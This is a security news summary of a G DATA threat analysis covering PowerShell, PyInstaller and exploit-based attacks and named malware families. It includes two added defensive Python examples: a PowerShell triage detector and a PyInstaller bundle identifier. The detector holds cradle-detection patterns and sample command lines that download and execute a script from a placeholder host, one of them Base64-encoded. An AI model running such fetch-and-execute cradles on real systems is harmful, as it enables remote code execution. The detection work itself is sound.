Cyber attacks via PowerShell, exploits and PyInstaller

B2B Cyber Security ShortNews

A threat analysis by G DATA CyberDefense shows that ransomware remains a major threat. At the same time, cybercriminals are increasingly using PowerShell and PyInstaller in their attacks. Vulnerabilities in applications and operating systems are also a popular attack vector.

Even though law enforcement agencies disrupted cybercriminal infrastructure in 2024, for example in Operations "Endgame" and "Power Off," criminals continue to find ways into IT systems. This does not require new malware: existing attack tools are being refined and combined with one another. The experts at G DATA CyberDefense have evaluated current threat data. The analysis shows that some attack vectors, such as information stealers, are declining, while others have increased:


PowerShell attacks have increased by 127 percent

SocGholish and ChromeLoader, in particular, were used very frequently by cybercriminals last year. SocGholish, also known as FakeUpdates, has been used by several cybercrime groups since 2017. The malware is a downloader that communicates via HTTP. The malicious software disguises itself as a fake browser update.

ChromeLoader is a persistent browser hijacker that modifies the settings of the affected browser and redirects internet traffic to advertising sites. Disguised as a browser extension, the malware spreads via an ISO file that pretends to be a cracked video game, pirated movie, or TV series to trick users into opening the file.
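The page attributes the rise to PowerShell-based attacks but shows none of the command lines involved. The following triage routine is an added example, not code from G DATA or from the analysis described here: it takes PowerShell command-line or script-block text (in practice from Event ID 4104 script block logging or 4688 process-creation events), decodes any -EncodedCommand argument (Base64 over UTF-16LE, as PowerShell expects), and flags common download-cradle, dynamic-execution and evasion-flag patterns. The indicator patterns, the alert threshold and the sample lines are constructed for illustration; the hostnames under .invalid are placeholders.

```python
"""Triage PowerShell command lines for loader traits (added example)."""
import base64
import re

# Heuristic indicators typical of PowerShell download cradles and loaders.
# Constructed for illustration; a production rule set would be broader.
INDICATORS = {
    "download_cradle": re.compile(
        r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|"
        r"\biwr\b|Start-BitsTransfer",
        re.I,
    ),
    "dynamic_exec": re.compile(
        r"Invoke-Expression|\biex\b|\[Reflection\.Assembly\]::Load|Add-Type",
        re.I,
    ),
    "evasion_flags": re.compile(
        r"-nop\b|-noprofile\b|-w(?:indowstyle)?\s+hidden|"
        r"-e(?:xecution)?p(?:olicy)?\s+bypass|-enc(?:odedcommand)?\b",
        re.I,
    ),
}

# -e / -enc / -EncodedCommand followed by a Base64 blob, which PowerShell
# decodes as UTF-16LE. Requiring 16+ characters avoids short false matches.
ENCODED_ARG = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(text: str):
    """Return the plaintext of an -EncodedCommand argument, or None."""
    m = ENCODED_ARG.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        # Not valid Base64 / not UTF-16LE: treat as "no decodable payload".
        return None


def triage(line: str) -> dict:
    """Score one command line; indicators are also matched on the decoded payload."""
    decoded = decode_encoded_command(line)
    haystack = line if decoded is None else f"{line}\n{decoded}"
    hits = [name for name, rx in INDICATORS.items() if rx.search(haystack)]
    if decoded is not None:
        hits.append("encoded_payload")
    hits.sort()
    # Two or more independent indicators is the (arbitrary) alert threshold.
    return {"hits": hits, "decoded": decoded, "suspicious": len(hits) >= 2}


# Constructed sample command lines; .invalid hostnames are placeholders.
ENCODED_PAYLOAD = (
    "(New-Object Net.WebClient).DownloadString('http://cdn.example.invalid/x') | IEX"
)
SAMPLE_LINES = [
    r"Get-ChildItem C:\Users | Select-Object Name",
    "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://updates.example.invalid/u.ps1')\"",
    "powershell.exe -nop -enc "
    + base64.b64encode(ENCODED_PAYLOAD.encode("utf-16-le")).decode("ascii"),
]

if __name__ == "__main__":
    for sample in SAMPLE_LINES:
        print(triage(sample))
```

The benign directory listing produces no hits, the plain cradle trips three indicators, and the encoded variant is only caught because the payload is decoded before matching; a rule that inspects only the visible command line would see nothing but `-nop -enc`.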


Python attacks have increased more than sixfold

Attackers rely on PyInstaller-based malware. PyInstaller is a legitimate packaging tool that bundles a Python script together with an interpreter and its dependencies into a standalone Windows EXE, so the malware can be written in Python and still run on machines without Python installed. Part of its appeal is how quickly such code can be written and repackaged. Particularly widespread is ChromePyJacker – a malware that infiltrates Chrome to load advertisements.
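To triage PyInstaller-based samples like those mentioned above, a practitioner first needs to recognize a PyInstaller bundle. The following is an added example, not code from G DATA: it locates the archive cookie that PyInstaller appends to the bundled executable (an 8-byte magic followed by archive length, TOC offset and length, Python version and the Python shared-library name, 88 bytes in total for PyInstaller 2.1 and later) and parses it. The sample bundle is constructed in the code and is not a real malware sample; versions before PyInstaller 2.1 used a shorter 24-byte cookie that this routine does not handle.

```python
"""Identify PyInstaller-bundled executables by their archive cookie (added example)."""
import struct

# Magic that opens PyInstaller's archive cookie (PyInstaller/archive/readers.py).
PYINST_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
# Cookie layout used since PyInstaller 2.1: magic, archive length, TOC offset,
# TOC length, Python version, Python shared-library name; big-endian, 88 bytes.
COOKIE_FMT = "!8sIIii64s"
COOKIE_SIZE = struct.calcsize(COOKIE_FMT)


def format_python_version(pyver: int) -> str:
    """PyInstaller stores 27/37 for 2.7/3.7 and 310/311 for 3.10 and later."""
    major, minor = divmod(pyver, 100) if pyver >= 100 else divmod(pyver, 10)
    return f"{major}.{minor}"


def find_pyinstaller_cookie(data: bytes):
    """Parse the trailing PyInstaller cookie; return its fields or None.

    The cookie is searched from the end of the file because an Authenticode
    signature or other overlay may sit after the archive.
    """
    idx = data.rfind(PYINST_MAGIC)
    if idx < 0 or idx + COOKIE_SIZE > len(data):
        return None
    _magic, archive_len, toc_offset, toc_length, pyver, pylib = struct.unpack(
        COOKIE_FMT, data[idx:idx + COOKIE_SIZE])
    archive_start = idx + COOKIE_SIZE - archive_len
    # Reject cookies whose offsets do not describe a consistent archive
    # (a stray magic string in unrelated data, or a truncated file).
    if archive_start < 0 or toc_offset + toc_length > archive_len:
        return None
    return {
        "archive_start": archive_start,
        "archive_len": archive_len,
        "toc_offset": toc_offset,
        "toc_length": toc_length,
        "python_version": format_python_version(pyver),
        "pylib_name": pylib.rstrip(b"\x00").decode("ascii", "replace"),
    }


def is_pyinstaller(data: bytes) -> bool:
    return find_pyinstaller_cookie(data) is not None


def make_sample_bundle() -> bytes:
    """Constructed stand-in for a PyInstaller EXE: fake PE header, fake
    archive body and TOC, a real-format cookie, then a trailing overlay."""
    header = b"MZ" + b"\x90" * 126   # 128 bytes standing in for the PE image
    body = b"\x00" * 64              # stands in for the compressed entries
    toc = b"T" * 32                  # stands in for the table of contents
    archive_len = len(body) + len(toc) + COOKIE_SIZE
    cookie = struct.pack(COOKIE_FMT, PYINST_MAGIC, archive_len, len(body),
                         len(toc), 311, b"python311.dll".ljust(64, b"\x00"))
    overlay = b"\x00" * 16           # where a signature blob might follow
    return header + body + toc + cookie + overlay


if __name__ == "__main__":
    print(find_pyinstaller_cookie(make_sample_bundle()))
    print(is_pyinstaller(b"MZ" + b"\x00" * 200))
```

Once the cookie is found, the TOC offset and length give the entry table of the embedded archive, which is the starting point for extracting the original Python script or bytecode for analysis.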

Exploit-based attacks have increased by 110 percent

G DATA security experts recorded a 110 percent increase in exploit-based attacks. Cyber gangs exploit vulnerabilities in operating systems and applications to deliver malware and compromise systems. It is striking that attackers still exploit vulnerabilities that are several years old and for which patches have long been available, for instance in Microsoft Office. The criminals count on important security updates not having been installed.

Trojans and RATs

Urelas takes the top spot – a Trojan for data theft and espionage. It targets Windows systems and uses sophisticated obfuscation techniques that make it difficult to detect and analyze. Gamarue, new to the ranking, spreads as a worm via portable storage media such as USB sticks, using Windows shortcut (LNK) files. Imperium, another newcomer, takes third place. The special feature of this stealer and keylogger: it is metamorphic, meaning it rewrites its own code with each new infection so that no two copies share the same internal structure, which defeats simple signature matching.

While remote access Trojans in particular appeared repeatedly in the top 10 in previous years, the picture for 2024 is diverse, with very different types of malware such as backdoors, stealers, and botnets. One explanation for the ranking: attackers combine different malware to increase profits. Another striking feature: some malware families have been active for a very long time, such as Buterat (since 2011) or Salgorea (since 2018). This is a sign that their developers are continuously maintaining and evolving them.

More at GData.de

About G Data

With comprehensive cyber defense services, the inventor of the antivirus enables companies to defend themselves against cybercrime. Over 500 employees ensure the digital security of companies and users. Made in Germany: with over 30 years of expertise in malware analysis, G DATA conducts research and software development exclusively in Germany. The highest standards of data protection are paramount. In 2011, G DATA issued a "no backdoor" guarantee with the "IT Security Made in Germany" seal of trust from TeleTrusT e.V. G DATA offers a portfolio ranging from antivirus and endpoint protection to penetration tests, incident response, forensic analyses, security status checks and cyber awareness training to defend companies effectively. New technologies such as DeepRay use artificial intelligence to protect against malware. Service and support are provided at the G DATA campus in Bochum. G DATA solutions are available in 90 countries and have received numerous awards.
